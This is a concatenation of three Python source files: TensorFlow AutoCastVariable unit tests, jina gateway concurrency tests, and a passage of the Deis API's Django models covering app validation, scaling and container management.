self.evaluate(x.initializer) with autocast_variable.enable_auto_cast_variables(dtypes.float16): self.assertEqual(x.read_value().dtype, dtypes.float16) with autocast_variable.enable_auto_cast_variables(dtypes.float32): self.assertEqual(x.read_value().dtype, dtypes.float32) self.assertEqual(x.read_value().dtype, dtypes.float16) @ds_combinations.generate(maybe_distribute) def test_dtype_is_not_string(self, distribution): with distribution.scope(): x = get_var(1., dtypes.float32) x = autocast_variable.create_autocast_variable(x) self.assertEqual(x.dtype, dtypes.float32) self.assertIsInstance(x.dtype, dtypes.DType) self.assertEqual(x.true_dtype, dtypes.float32) self.assertIsInstance(x.true_dtype, dtypes.DType) dtype = dtypes.float16 with autocast_variable.enable_auto_cast_variables(dtype): self.assertEqual(x.dtype, dtypes.float32) self.assertIsInstance(x.dtype, dtypes.DType) self.assertEqual(x.true_dtype, dtypes.float32) self.assertIsInstance(x.true_dtype, dtypes.DType) @ds_combinations.generate(maybe_distribute) def test_method_delegations(self, distribution): # Test AutoCastVariable correctly delegates Variable methods to the # underlying variable. with self.test_session(), distribution.scope(): for read_dtype in (dtypes.float32, dtypes.float16): if ds_context.has_strategy(): # MirroredVariable.assign will (incorrectly) return a Mirrored value # instead of a MirroredVariable. So we cannot properly wrap it in an # AutoCastVariable. 
evaluate = self.evaluate else: def evaluate(var): self.assertIsInstance(var, autocast_variable.AutoCastVariable) self.assertEqual(array_ops.identity(var).dtype, read_dtype) # pylint: disable=cell-var-from-loop return self.evaluate(var) x = get_var(7., dtypes.float32) x = autocast_variable.create_autocast_variable(x) with autocast_variable.enable_auto_cast_variables(read_dtype): self.evaluate(x.initializer) self.assertEqual(self.evaluate(x.value()), 7) self.assertEqual(self.evaluate(x.read_value()), 7) self.assertTrue(x.trainable) self.assertEqual(x.synchronization, x._variable.synchronization) self.assertEqual(x.aggregation, x._variable.aggregation) self.assertEqual(self.evaluate(x.initialized_value()), 7) if not context.executing_eagerly(): if not ds_context.has_strategy(): # These functions are not supported for DistributedVariables x.load(9) self.assertEqual(x.eval(), 9) self.assertEqual(self.evaluate(x.initial_value), 7) self.assertEqual(x.op, x._variable.op) self.assertEqual(x.graph, x._variable.graph) if not ds_context.has_strategy(): # These attributes are not supported for DistributedVariables self.assertIsNone(x.constraint) self.assertEqual(x.initializer, x._variable.initializer) self.assertEqual(evaluate(x.assign(8)), 8) self.assertEqual(evaluate(x.assign_add(2)), 10) self.assertEqual(evaluate(x.assign_sub(3)), 7) self.assertEqual(x.name, x._variable.name) self.assertEqual(x.device, x._variable.device) self.assertEqual(x.shape, ()) self.assertEqual(x.get_shape(), ()) if not ds_context.has_strategy(): # Test scatter_* methods. These are not supported for # DistributedVariables x = get_var([7, 8], dtypes.float32) x = autocast_variable.create_autocast_variable(x) with autocast_variable.enable_auto_cast_variables(read_dtype): self.evaluate(x.initializer) self.assertAllEqual(self.evaluate(x.value()), [7, 8]) def slices(val, index): return indexed_slices.IndexedSlices( values=constant_op.constant(val, dtype=dtypes.float32), indices=constant_op.constant(index, dtype=dtypes.int32), dense_shape=constant_op.constant([2], dtype=dtypes.int32)) self.assertAllEqual(evaluate(x.scatter_sub(slices(1., 0))), [6, 8]) self.assertAllEqual(evaluate(x.scatter_add(slices(1., 0))), [7, 8]) self.assertAllEqual(evaluate(x.scatter_max(slices(9., 1))), [7, 9]) self.assertAllEqual(evaluate(x.scatter_min(slices(8., 1))), [7, 8]) self.assertAllEqual(evaluate(x.scatter_mul(slices(2., 1))), [7, 16]) self.assertAllEqual(evaluate(x.scatter_div(slices(2., 1))), [7, 8]) self.assertAllEqual( evaluate(x.scatter_update(slices(4., 1))), [7, 4]) self.assertAllEqual( evaluate(x.scatter_nd_sub([[0], [1]], [1., 2.])), [6, 2]) self.assertAllEqual( evaluate(x.scatter_nd_add([[0], [1]], [1., 2.])), [7, 4]) self.assertAllEqual( evaluate(x.scatter_nd_update([[0], [1]], [1., 2.])), [1, 2]) @ds_combinations.generate(maybe_distribute) def test_operator_overloads(self, distribution): with distribution.scope(): for read_dtype in (dtypes.float32, dtypes.float16): x = get_var(7., dtypes.float32) x = autocast_variable.create_autocast_variable(x) with autocast_variable.enable_auto_cast_variables(read_dtype): self.evaluate(x.initializer) self.assertAlmostEqual(8, self.evaluate(x + 1)) self.assertAlmostEqual(10, self.evaluate(3 + x)) self.assertAlmostEqual(14, self.evaluate(x + x)) self.assertAlmostEqual(5, self.evaluate(x - 2)) self.assertAlmostEqual(6, self.evaluate(13 - x)) self.assertAlmostEqual(0, self.evaluate(x - x)) self.assertAlmostEqual(14, self.evaluate(x * 2)) self.assertAlmostEqual(21, self.evaluate(3 * x)) 
self.assertAlmostEqual(49, self.evaluate(x * x)) self.assertAlmostEqual(3.5, self.evaluate(x / 2)) self.assertAlmostEqual(1.5, self.evaluate(10.5 / x)) self.assertAlmostEqual(3, self.evaluate(x // 2)) self.assertAlmostEqual(2, self.evaluate(15 // x)) if read_dtype == dtypes.float32: # The "mod" operator does not support float16 self.assertAlmostEqual(1, self.evaluate(x % 2)) self.assertAlmostEqual(2, self.evaluate(16 % x)) self.assertTrue(self.evaluate(x < 12)) self.assertTrue(self.evaluate(x <= 12)) self.assertFalse(self.evaluate(x > 12)) self.assertFalse(self.evaluate(x >= 12)) self.assertFalse(self.evaluate(12 < x)) self.assertFalse(self.evaluate(12 <= x)) self.assertTrue(self.evaluate(12 > x)) self.assertTrue(self.evaluate(12 >= x)) self.assertAlmostEqual(343, self.evaluate(pow(x, 3)), places=4) self.assertAlmostEqual(128, self.evaluate(pow(2, x)), places=4) self.assertAlmostEqual(-7, self.evaluate(-x)) self.assertAlmostEqual(7, self.evaluate(abs(x))) x = get_var([7, 8, 9], dtypes.float32) x = autocast_variable.create_autocast_variable(x) self.evaluate(x.initializer) self.assertEqual(self.evaluate(x[1]), 8) if tf2.enabled() and context.executing_eagerly(): self.assertAllEqual(x == [7., 8., 10.], [True, True, False]) self.assertAllEqual(x != [7., 8., 10.], [False, False, True]) @ds_combinations.generate(maybe_distribute) def test_assign(self, distribution): with distribution.scope(): x = get_var(0., dtypes.float32) x = autocast_variable.create_autocast_variable(x) self.evaluate(x.initializer) # outside of auto cast scope. v1 = constant_op.constant(3., dtype=dtypes.float32) v2 = constant_op.constant(3., dtype=dtypes.float16) def run_and_check(): # Assign float32 values self.assertAllClose(3., self.evaluate(x.assign(v1))) self.assertAllClose(3. * 2, self.evaluate(x.assign_add(v1))) self.assertAllClose(3., self.evaluate(x.assign_sub(v1))) # Attempt to assign float16 values with self.assertRaisesRegex( ValueError, 'conversion requested dtype float32 for Tensor with dtype float16'): self.evaluate(x.assign(v2)) with self.assertRaisesRegex( ValueError, 'conversion requested dtype float32 for Tensor with dtype float16'): self.evaluate(x.assign_add(v2)) with self.assertRaisesRegex( ValueError, 'conversion requested dtype float32 for Tensor with dtype float16'): self.evaluate(x.assign_sub(v2)) # Assign Python floats self.assertAllClose(0., self.evaluate(x.assign(0.))) self.assertAllClose(3., self.evaluate(x.assign(3.))) self.assertAllClose(3. * 2, self.evaluate(x.assign_add(3.))) self.assertAllClose(3., self.evaluate(x.assign_sub(3.))) # Assign multiple times # This currently doesn't work in graph mode if a strategy is used if not ds_context.has_strategy() or context.executing_eagerly(): assign = x.assign(1.) self.assertAllClose(1., self.evaluate(assign)) self.assertAllClose(0., self.evaluate(assign.assign(0.))) assign_add = x.assign_add(3.) self.assertAllClose(3., self.evaluate(assign_add)) self.assertAllClose(3. * 3, self.evaluate(x.assign_add(3.).assign_add(3.))) self.assertAllClose(3. * 3, x) assign_sub = x.assign_sub(3.) self.assertAllClose(3. 
* 2, self.evaluate(assign_sub)) self.assertAllClose(0., self.evaluate(x.assign_sub(3.).assign_sub(3.))) # Assign with read_value=False self.assertIsNone(self.evaluate(x.assign(1., read_value=False))) self.assertAllClose(1., self.evaluate(x)) self.assertIsNone(self.evaluate(x.assign_add(2., read_value=False))) self.assertAllClose(3., self.evaluate(x)) self.assertIsNone(self.evaluate(x.assign_sub(3., read_value=False))) self.assertAllClose(0., self.evaluate(x)) # Use the tf.assign functions instead of the var.assign methods. self.assertAllClose(0., self.evaluate(state_ops.assign(x, 0.))) self.assertAllClose(3., self.evaluate(state_ops.assign(x, 3.))) self.assertAllClose(3. * 2, self.evaluate(state_ops.assign_add(x, 3.))) self.assertAllClose(3., self.evaluate(state_ops.assign_sub(x, 3.))) run_and_check() # reset x self.evaluate(x.assign(0.)) # within auto cast scope. with autocast_variable.enable_auto_cast_variables(dtypes.float16): # assign still expect float32 value even if in float16 scope run_and_check() @ds_combinations.generate(maybe_distribute) def test_assign_tf_function(self, distribution): if not context.executing_eagerly(): self.skipTest('Test is not compatible with graph mode') with distribution.scope(): x = get_var(0., dtypes.float32) x = autocast_variable.create_autocast_variable(x) @def_function.function def run_assign(): return x.assign(1.).assign_add(3.).assign_add(3.).assign_sub(2.) with autocast_variable.enable_auto_cast_variables(dtypes.float16): self.assertAllClose(5., self.evaluate(run_assign())) @ds_combinations.generate(maybe_distribute) def test_op_attribute(self, distribution): with distribution.scope(): x = get_var(0., dtypes.float32) x = autocast_variable.create_autocast_variable(x) # Variable.op raises an AttributeError in Eager mode and is an op in graph # mode. Variable.assign(...).op is None in Eager mode and an op in Graph # mode or a tf.function. We test this is also true of AutoCastVariable. if context.executing_eagerly(): with self.assertRaisesRegex( AttributeError, 'Tensor.op is meaningless when eager execution is enabled'): x.op # pylint: disable=pointless-statement self.assertIsNone(x.assign(1.0).op) self.assertIsNone(x.assign_add(1.0).op) self.assertIsNone(x.assign_sub(1.0).op) else: self.assertIsNotNone(x.op) self.assertIsNotNone(x.assign(1.0).op) self.assertIsNotNone(x.assign_add(1.0).op) self.assertIsNotNone(x.assign_sub(1.0).op) @def_function.function def func(): self.assertIsNotNone(x.assign(1.0).op) self.assertIsNotNone(x.assign_add(1.0).op) self.assertIsNotNone(x.assign_sub(1.0).op) func() @ds_combinations.generate(maybe_distribute) def test_tf_function_control_dependencies(self, distribution): if not context.executing_eagerly(): self.skipTest('Test is not compatible with graph mode') with distribution.scope(): x = get_var(0., dtypes.float32) x = autocast_variable.create_autocast_variable(x) @def_function.function def func(): update = x.assign_add(1.) with ops.control_dependencies([update]): x.assign_add(1.) 
func() self.assertAllClose(2., self.evaluate(x)) @ds_combinations.generate(maybe_distribute) def test_assign_stays_in_true_dtype(self, distribution): with distribution.scope(): x = get_var(1., dtypes.float32) x = autocast_variable.create_autocast_variable(x) self.evaluate(x.initializer) # small_val is a value such that 1.0 + small_val == 1.0 in fp16, but not # in fp32 small_val = np.finfo('float16').eps / 2 small_tensor = constant_op.constant(small_val, dtype=dtypes.float32) with autocast_variable.enable_auto_cast_variables(dtypes.float16): # Variable should be increased, despite it appearing to be the same # float16 value. self.evaluate(x.assign(1. + small_tensor)) self.assertEqual(1., self.evaluate(x.value())) self.assertEqual(1. + small_val, self.evaluate(x)) self.evaluate(x.assign(1.)) with autocast_variable.enable_auto_cast_variables(dtypes.float16): self.evaluate(x.assign_add(small_tensor)) self.assertEqual(1., self.evaluate(x.value())) self.assertEqual(1. + small_val, self.evaluate(x)) def test_thread_local_autocast_dtype(self): x = get_var(1., dtypes.float32) x = autocast_variable.create_autocast_variable(x) self.evaluate(x.initializer) with autocast_variable.enable_auto_cast_variables(dtypes.float16): self.assertEqual(array_ops.identity(x).dtype, dtypes.float16) # New threads should not see the modified value of the autocast dtype. var_dtype = None def f(): nonlocal var_dtype var_dtype = x._cast_dtype thread = threading.Thread(target=f) thread.start() thread.join() self.assertEqual(var_dtype, dtypes.float32) @ds_combinations.generate(maybe_distribute) def test_checkpoint(self, distribution): with self.test_session(): with distribution.scope(): x = get_var(1., dtypes.float32) x = autocast_variable.create_autocast_variable(x) self.evaluate(x.initializer) self.evaluate(x.assign(123.)) checkpoint = trackable_utils.Checkpoint(x=x) prefix = os.path.join(self.get_temp_dir(), 'ckpt') save_path = checkpoint.save(prefix) self.evaluate(x.assign(234.)) checkpoint.restore(save_path).assert_consumed().run_restore_ops() self.assertEqual(self.evaluate(x), 123.) @ds_combinations.generate(maybe_distribute) def test_invalid_wrapped_variable(self, distribution): with distribution.scope(): # Wrap a non-variable with self.assertRaisesRegex(ValueError, 'variable must be of type'): x = constant_op.constant([1.], dtype=dtypes.float32) autocast_variable.create_autocast_variable(x) # Wrap a non-floating point variable with self.assertRaisesRegex(ValueError, 'variable must be a floating point'): x = get_var(1, dtypes.int32) autocast_variable.create_autocast_variable(x) def test_repr(self): # We do not test with DistributionStrategy because we do not want to rely on # the exact __repr__ output of a DistributedVariable. 
x = get_var(1., dtypes.float32, name='x') x = autocast_variable.create_autocast_variable(x) if context.executing_eagerly(): self.assertStartsWith( repr(x), "<AutoCastVariable 'x:0' shape=() dtype=float32 " "dtype_to_cast_to=float32, numpy=" ) with autocast_variable.enable_auto_cast_variables(dtypes.float16): self.assertStartsWith( repr(x), "<AutoCastVariable 'x:0' shape=() dtype=float32 " "dtype_to_cast_to=float16, numpy=" ) else: self.assertEqual( repr(x), "<AutoCastVariable 'x:0' shape=() dtype=float32 " "dtype_to_cast_to=float32>" ) with autocast_variable.enable_auto_cast_variables(dtypes.float16): self.assertEqual( repr(x), "<AutoCastVariable 'x:0' shape=() dtype=float32 " "dtype_to_cast_to=float16>" ) def test_repr_distributed(self): strategy = mirrored_strategy.MirroredStrategy(['/cpu:1', '/cpu:2']) with strategy.scope(): x = get_var(1., dtypes.float32) x = autocast_variable.create_autocast_variable(x) use_policy = getattr(strategy.extended, '_use_var_policy', False) if use_policy: self.assertRegex( repr(x).replace('\n', ' '), '<AutoCastDistributedVariable dtype=float32 ' 'dtype_to_cast_to=float32 ' 'inner_variable=DistributedVariable.*>') else: self.assertRegex( repr(x).replace('\n', ' '), '<AutoCastDistributedVariable dtype=float32 ' 'dtype_to_cast_to=float32 ' 'inner_variable=MirroredVariable.*>') @ds_combinations.generate(combinations.combine( optimizer_class=[ adadelta.Adadelta, adagrad.Adagrad, adam.Adam, adamax.Adamax, ftrl.Ftrl, gradient_descent_v2.SGD, nadam.Nadam, rmsprop.RMSprop, gradient_descent_v1.GradientDescentOptimizer ], use_tf_function=[False, True])) def test_optimizer(self, optimizer_class, use_tf_function): if use_tf_function and not context.executing_eagerly(): self.skipTest('Test does not support graph mode with tf.function') x = get_var(1., dtypes.float32) x = autocast_variable.create_autocast_variable(x) y = get_var(1., dtypes.float32) opt = optimizer_class(learning_rate=1.) def f(): # Minimize both the AutoCastVariable and the normal tf.Variable. Both # variables should be updated to the same value. op = opt.minimize(lambda: x + y, var_list=[x, y]) return None if ops.executing_eagerly_outside_functions() else op if use_tf_function: f = def_function.function(f) if context.executing_eagerly(): f() else: op = f() self.evaluate(variables.global_variables_initializer()) self.evaluate(op) # Assert the AutoCastVariable has changed from its initial value self.assertNotEqual(self.evaluate(x), 1.) # Assert AutoCastVariable is updated correctly by comparing it to the normal # variable self.assertAlmostEqual(self.evaluate(x), self.evaluate(y)) if optimizer_class in (gradient_descent_v2.SGD, gradient_descent_v1.GradientDescentOptimizer): # With SGD, the variables decreases by exactly 1 self.assertEqual(self.evaluate(x), 0) if __name__ == '__main__': test.main()
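# Illustrative sketch (not part of autocast_variable_test.py above):
# test_thread_local_autocast_dtype checks that the active cast dtype is
# thread-local state, i.e. a scope entered on one thread is invisible to
# others. A minimal, hedged model of that behaviour using threading.local and
# a hypothetical scope manager, not the TensorFlow internals themselves:
import contextlib
import threading

_state = threading.local()


def current_dtype():
    return getattr(_state, 'dtype', 'float32')   # default when no scope is active


@contextlib.contextmanager
def cast_scope(dtype):
    previous = current_dtype()
    _state.dtype = dtype
    try:
        yield
    finally:
        _state.dtype = previous


def main():
    seen_in_thread = []
    with cast_scope('float16'):
        t = threading.Thread(target=lambda: seen_in_thread.append(current_dtype()))
        t.start()
        t.join()
        assert current_dtype() == 'float16'
    # The new thread never saw the float16 scope entered on the main thread.
    assert seen_in_thread == ['float32'], seen_in_thread


if __name__ == '__main__':
    main()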
test_gateway.py
import functools import time from threading import Thread import numpy as np import pytest import requests from jina.flow import Flow concurrency = 10 # @pytest.mark.skip('this tests hang up for unknown reason on github') def test_rest_gateway_concurrency(): def _request(status_codes, durations, index): resp = requests.post( f'http://0.0.0.0:{f.port_expose}/api/index', json={ 'data': [ 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAgAAAAICAIAAABLbSncAAAA2ElEQVR4nADIADf/AxWcWRUeCEeBO68T3u1qLWarHqMaxDnxhAEaLh0Ssu6ZGfnKcjP4CeDLoJok3o4aOPYAJocsjktZfo4Z7Q/WR1UTgppAAdguAhR+AUm9AnqRH2jgdBZ0R+kKxAFoAME32BL7fwQbcLzhw+dXMmY9BS9K8EarXyWLH8VYK1MACkxlLTY4Eh69XfjpROqjE7P0AeBx6DGmA8/lRRlTCmPkL196pC0aWBkVs2wyjqb/LABVYL8Xgeomjl3VtEMxAeaUrGvnIawVh/oBAAD///GwU6v3yCoVAAAAAElFTkSuQmCC', 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAgAAAAICAIAAABLbSncAAAA2ElEQVR4nADIADf/AvdGjTZeOlQq07xSYPgJjlWRwfWEBx2+CgAVrPrP+O5ghhOa+a0cocoWnaMJFAsBuCQCgiJOKDBcIQTiLieOrPD/cp/6iZ/Iu4HqAh5dGzggIQVJI3WqTxwVTDjs5XJOy38AlgHoaKgY+xJEXeFTyR7FOfF7JNWjs3b8evQE6B2dTDvQZx3n3Rz6rgOtVlaZRLvR9geCAxuY3G+0mepEAhrTISES3bwPWYYi48OUrQOc//IaJeij9xZGGmDIG9kc73fNI7eA8VMBAAD//0SxXMMT90UdAAAAAElFTkSuQmCC']}) durations[index] = resp.elapsed.total_seconds() status_codes[index] = resp.status_code f = Flow(rest_api=True).add( uses='_pass', parallel=2) with f: concurrency = 50 threads = [] status_codes = [None] * concurrency durations = [None] * concurrency for i in range(concurrency): t = Thread(target=_request, args=(status_codes, durations, i)) t.daemon = True t.start() threads.append(t) for t in threads: t.join() success = status_codes.count(200) failed = len(status_codes) - success print( f'\nmin roundtrip time: {np.min(durations)}\n', f'max roundtrip time: {np.max(durations)}\n' f'mean roundtrip time: {np.mean(durations)}\n' ) assert success >= 1 # In some slow environments, a certain degree of failed # requests will occur. Here we limit the degree of failed # requests. 
rate = failed / success assert rate < 0.1 @pytest.mark.skip('raw grpc gateway is not stable enough under high concurrency') def test_grpc_gateway_concurrency(): def _input_fn(): return iter([ 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAgAAAAICAIAAABLbSncAAAA2ElEQVR4nADIADf/AxWcWRUeCEeBO68T3u1qLWarHqMaxDnxhAEaLh0Ssu6ZGfnKcjP4CeDLoJok3o4aOPYAJocsjktZfo4Z7Q/WR1UTgppAAdguAhR+AUm9AnqRH2jgdBZ0R+kKxAFoAME32BL7fwQbcLzhw+dXMmY9BS9K8EarXyWLH8VYK1MACkxlLTY4Eh69XfjpROqjE7P0AeBx6DGmA8/lRRlTCmPkL196pC0aWBkVs2wyjqb/LABVYL8Xgeomjl3VtEMxAeaUrGvnIawVh/oBAAD///GwU6v3yCoVAAAAAElFTkSuQmCC', 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAgAAAAICAIAAABLbSncAAAA2ElEQVR4nADIADf/AvdGjTZeOlQq07xSYPgJjlWRwfWEBx2+CgAVrPrP+O5ghhOa+a0cocoWnaMJFAsBuCQCgiJOKDBcIQTiLieOrPD/cp/6iZ/Iu4HqAh5dGzggIQVJI3WqTxwVTDjs5XJOy38AlgHoaKgY+xJEXeFTyR7FOfF7JNWjs3b8evQE6B2dTDvQZx3n3Rz6rgOtVlaZRLvR9geCAxuY3G+0mepEAhrTISES3bwPWYYi48OUrQOc//IaJeij9xZGGmDIG9kc73fNI7eA8VMBAAD//0SxXMMT90UdAAAAAElFTkSuQmCC']) def _validate(req, start, status_codes, durations, index): end = time.time() durations[index] = (end - start) status_codes[index] = req.status.code def _request(f, status_codes, durations, index): start = time.time() f.index( input_fn=_input_fn, output_fn=functools.partial( _validate, start=start, status_codes=status_codes, durations=durations, index=index )) f = Flow().add( uses='_pass', parallel=2) with f: threads = [] status_codes = [None] * concurrency durations = [None] * concurrency for i in range(concurrency): t = Thread( target=_request, args=( f, status_codes, durations, i)) threads.append(t) t.start() for t in threads: t.join() print(f'terminate {t}') success = status_codes.count(0) failed = len(status_codes) - success print( f'\nmin roundtrip time: {np.min(durations)}\n', f'max roundtrip time: {np.max(durations)}\n' f'mean roundtrip time: {np.mean(durations)}\n' ) assert success >= 1 # In some slow environments, a certain degree of failed # requests will occur. Here we limit the degree of failed # requests. rate = failed / success assert rate < 0.1
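# Illustrative sketch (not from the original test file above; run_concurrently
# is a hypothetical helper, not a jina API). Both tests share the same shape:
# start `concurrency` threads, let each one record a status code and a duration
# at its own index, join everything, then check the failure rate. The pattern
# reduces to:
from threading import Thread


def run_concurrently(fn, concurrency):
    """Run fn(status_codes, durations, index) in `concurrency` daemon threads."""
    status_codes = [None] * concurrency
    durations = [None] * concurrency
    threads = [Thread(target=fn, args=(status_codes, durations, i), daemon=True)
               for i in range(concurrency)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return status_codes, durations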
models.py
# -*- coding: utf-8 -*- """ Data models for the Deis API. """ from __future__ import unicode_literals import base64 from datetime import datetime import etcd import importlib import logging import os import re import subprocess import time from threading import Thread from django.conf import settings from django.contrib.auth import get_user_model from django.core.exceptions import ValidationError, SuspiciousOperation from django.db import models from django.db.models import Count from django.db.models import Max from django.db.models.signals import post_delete, post_save from django.dispatch import receiver from django.utils.encoding import python_2_unicode_compatible from docker.utils import utils as dockerutils from json_field.fields import JSONField from OpenSSL import crypto import requests from rest_framework.authtoken.models import Token from api import fields, utils, exceptions from registry import publish_release from utils import dict_diff, fingerprint logger = logging.getLogger(__name__) def close_db_connections(func, *args, **kwargs): """ Decorator to explicitly close db connections during threaded execution Note this is necessary to work around: https://code.djangoproject.com/ticket/22420 """ def _close_db_connections(*args, **kwargs): ret = None try: ret = func(*args, **kwargs) finally: from django.db import connections for conn in connections.all(): conn.close() return ret return _close_db_connections def log_event(app, msg, level=logging.INFO): # controller needs to know which app this log comes from logger.log(level, "{}: {}".format(app.id, msg)) app.log(msg) def validate_base64(value): """Check that value contains only valid base64 characters.""" try: base64.b64decode(value.split()[1]) except Exception as e: raise ValidationError(e) def validate_id_is_docker_compatible(value): """ Check that the ID follows docker's image name constraints """ match = re.match(r'^[a-z0-9-]+$', value) if not match: raise ValidationError("App IDs can only contain [a-z0-9-].") def validate_app_structure(value): """Error if the dict values aren't ints >= 0.""" try: if any(int(v) < 0 for v in value.viewvalues()): raise ValueError("Must be greater than or equal to zero") except ValueError, err: raise ValidationError(err) def validate_reserved_names(value): """A value cannot use some reserved names.""" if value in settings.DEIS_RESERVED_NAMES: raise ValidationError('{} is a reserved name.'.format(value)) def validate_comma_separated(value): """Error if the value doesn't look like a list of hostnames or IP addresses separated by commas. 
""" if not re.search(r'^[a-zA-Z0-9-,\.]+$', value): raise ValidationError( "{} should be a comma-separated list".format(value)) def validate_domain(value): """Error if the domain contains unexpected characters.""" if not re.search(r'^[a-zA-Z0-9-\.]+$', value): raise ValidationError('"{}" contains unexpected characters'.format(value)) def validate_certificate(value): try: crypto.load_certificate(crypto.FILETYPE_PEM, value) except crypto.Error as e: raise ValidationError('Could not load certificate: {}'.format(e)) def get_etcd_client(): if not hasattr(get_etcd_client, "client"): # wire up etcd publishing if we can connect try: get_etcd_client.client = etcd.Client( host=settings.ETCD_HOST, port=int(settings.ETCD_PORT)) get_etcd_client.client.get('/deis') except etcd.EtcdException: logger.log(logging.WARNING, 'Cannot synchronize with etcd cluster') get_etcd_client.client = None return get_etcd_client.client class AuditedModel(models.Model): """Add created and updated fields to a model.""" created = models.DateTimeField(auto_now_add=True) updated = models.DateTimeField(auto_now=True) class Meta: """Mark :class:`AuditedModel` as abstract.""" abstract = True def select_app_name(): """Select a unique randomly generated app name""" name = utils.generate_app_name() while App.objects.filter(id=name).exists(): name = utils.generate_app_name() return name class UuidAuditedModel(AuditedModel): """Add a UUID primary key to an :class:`AuditedModel`.""" uuid = fields.UuidField('UUID', primary_key=True) class Meta: """Mark :class:`UuidAuditedModel` as abstract.""" abstract = True @python_2_unicode_compatible class App(UuidAuditedModel): """ Application used to service requests on behalf of end-users """ owner = models.ForeignKey(settings.AUTH_USER_MODEL) id = models.SlugField(max_length=64, unique=True, default=select_app_name, validators=[validate_id_is_docker_compatible, validate_reserved_names]) structure = JSONField(default={}, blank=True, validators=[validate_app_structure]) class Meta: permissions = (('use_app', 'Can use app'),) @property def _scheduler(self): mod = importlib.import_module(settings.SCHEDULER_MODULE) return mod.SchedulerClient(settings.SCHEDULER_TARGET, settings.SCHEDULER_AUTH, settings.SCHEDULER_OPTIONS, settings.SSH_PRIVATE_KEY) def __str__(self): return self.id @property def url(self): return self.id + '.' + settings.DEIS_DOMAIN def _get_job_id(self, container_type): app = self.id release = self.release_set.latest() version = "v{}".format(release.version) job_id = "{app}_{version}.{container_type}".format(**locals()) return job_id def _get_command(self, container_type): try: # if this is not procfile-based app, ensure they cannot break out # and run arbitrary commands on the host # FIXME: remove slugrunner's hardcoded entrypoint release = self.release_set.latest() if release.build.dockerfile or not release.build.sha: return "bash -c '{}'".format(release.build.procfile[container_type]) else: return 'start {}'.format(container_type) # if the key is not present or if a parent attribute is None except (KeyError, TypeError, AttributeError): # handle special case for Dockerfile deployments return '' if container_type == 'cmd' else 'start {}'.format(container_type) def log(self, message): """Logs a message to the application's log file. This is a workaround for how Django interacts with Python's logging module. Each app needs its own FileHandler instance so it can write to its own log file. 
That won't work in Django's case because logging is set up before you run the server and it disables all existing logging configurations. """ with open(os.path.join(settings.DEIS_LOG_DIR, self.id + '.log'), 'a') as f: msg = "{} deis[api]: {}\n".format(time.strftime(settings.DEIS_DATETIME_FORMAT), message) f.write(msg.encode('utf-8')) def create(self, *args, **kwargs): """Create a new application with an initial config and release""" config = Config.objects.create(owner=self.owner, app=self) Release.objects.create(version=1, owner=self.owner, app=self, config=config, build=None) def delete(self, *args, **kwargs): """Delete this application including all containers""" try: # attempt to remove containers from the scheduler self._destroy_containers([c for c in self.container_set.exclude(type='run')]) except RuntimeError: pass self._clean_app_logs() return super(App, self).delete(*args, **kwargs) def restart(self, **kwargs): to_restart = self.container_set.all() if kwargs.get('type'): to_restart = to_restart.filter(type=kwargs.get('type')) if kwargs.get('num'): to_restart = to_restart.filter(num=kwargs.get('num')) self._restart_containers(to_restart) return to_restart def _clean_app_logs(self): """Delete application logs stored by the logger component""" path = os.path.join(settings.DEIS_LOG_DIR, self.id + '.log') if os.path.exists(path): os.remove(path) def scale(self, user, structure): # noqa """Scale containers up or down to match requested structure.""" if self.release_set.latest().build is None: raise EnvironmentError('No build associated with this release') requested_structure = structure.copy() release = self.release_set.latest() # test for available process types available_process_types = release.build.procfile or {} for container_type in requested_structure: if container_type == 'cmd': continue # allow docker cmd types in case we don't have the image source if container_type not in available_process_types: raise EnvironmentError( 'Container type {} does not exist in application'.format(container_type)) msg = '{} scaled containers '.format(user.username) + ' '.join( "{}={}".format(k, v) for k, v in requested_structure.items()) log_event(self, msg) # iterate and scale by container type (web, worker, etc) changed = False to_add, to_remove = [], [] scale_types = {} # iterate on a copy of the container_type keys for container_type in requested_structure.keys(): containers = list(self.container_set.filter(type=container_type).order_by('created')) # increment new container nums off the most recent container results = self.container_set.filter(type=container_type).aggregate(Max('num')) container_num = (results.get('num__max') or 0) + 1 requested = requested_structure.pop(container_type) diff = requested - len(containers) if diff == 0: continue changed = True scale_types[container_type] = requested while diff < 0: c = containers.pop() to_remove.append(c) diff += 1 while diff > 0: # create a database record c = Container.objects.create(owner=self.owner, app=self, release=release, type=container_type, num=container_num) to_add.append(c) container_num += 1 diff -= 1 if changed: if "scale" in dir(self._scheduler): self._scale_containers(scale_types, to_remove) else: if to_add: self._start_containers(to_add) if to_remove: self._destroy_containers(to_remove) # save new structure to the database vals = self.container_set.exclude(type='run').values( 'type').annotate(Count('pk')).order_by() new_structure = structure.copy() new_structure.update({v['type']: v['pk__count'] for v in vals}) self.structure = 
new_structure self.save() return changed def _scale_containers(self, scale_types, to_remove): release = self.release_set.latest() for scale_type in scale_types: image = release.image version = "v{}".format(release.version) kwargs = {'memory': release.config.memory, 'cpu': release.config.cpu, 'tags': release.config.tags, 'version': version, 'aname': self.id, 'num': scale_types[scale_type]} job_id = self._get_job_id(scale_type) command = self._get_command(scale_type) try: self._scheduler.scale( name=job_id, image=image, command=command, **kwargs) except Exception as e: err = '{} (scale): {}'.format(job_id, e) log_event(self, err, logging.ERROR) raise [c.delete() for c in to_remove] def _start_containers(self, to_add): """Creates and starts containers via the scheduler""" if not to_add: return create_threads = [Thread(target=c.create) for c in to_add] start_threads = [Thread(target=c.start) for c in to_add] [t.start() for t in create_threads] [t.join() for t in create_threads] if any(c.state != 'created' for c in to_add): err = 'aborting, failed to create some containers' log_event(self, err, logging.ERROR) self._destroy_containers(to_add) raise RuntimeError(err) [t.start() for t in start_threads] [t.join() for t in start_threads] if set([c.state for c in to_add]) != set(['up']): err = 'warning, some containers failed to start' log_event(self, err, logging.WARNING) # if the user specified a health check, try checking to see if it's running try: config = self.config_set.latest() if 'HEALTHCHECK_URL' in config.values.keys(): self._healthcheck(to_add, config.values) except Config.DoesNotExist: pass def _healthcheck(self, containers, config): # if at first it fails, back off and try again at 10%, 50% and 100% of INITIAL_DELAY intervals = [1.0, 0.1, 0.5, 1.0] # HACK (bacongobbler): we need to wait until publisher has a chance to publish each # service to etcd, which can take up to 20 seconds. 
